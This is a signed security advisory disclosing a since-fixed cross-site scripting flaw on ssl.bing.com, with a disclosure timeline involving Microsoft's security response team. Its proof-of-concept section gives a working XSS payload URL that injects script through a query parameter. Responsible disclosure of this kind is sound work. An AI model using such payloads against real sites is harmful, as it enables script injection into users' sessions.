-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory: ssl.bing.com - Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-012
Author: Stefan Schurtz
Affected Software: Successfully tested on ssl.bing.com
Vendor URL: http://www.microsoft.com
Vendor Status: fixed

==========================
Vulnerability Description
==========================

The website 'ssl.bing.com' is prone to a Cross-site Scripting vulnerability

==========================
PoC-Exploit
==========================

https://ssl.bing.com/webmaster/home/mysites?orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6

==========================
Disclosure Timeline
==========================

29-Dec-2013 - informed Microsoft Security Response Center
30-Dec-2013 - feedback from Microsoft Security Response Center
31-Dec-2013 - status update from Microsoft Security Response Center
03-Jan-2014 - status update from Microsoft Security Response Center
24-Jan-2014 - informed from MSRC about fix

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.microsoft.com/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-012.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlLjrWkACgkQg3svV2LcbMBQZgCfV+hU5m/M9+K18dBuVw8JC2mF
T6QAni+zUWH7UO+mRnyB1mSb0l5Jkhc2
=87yA
-----END PGP SIGNATURE-----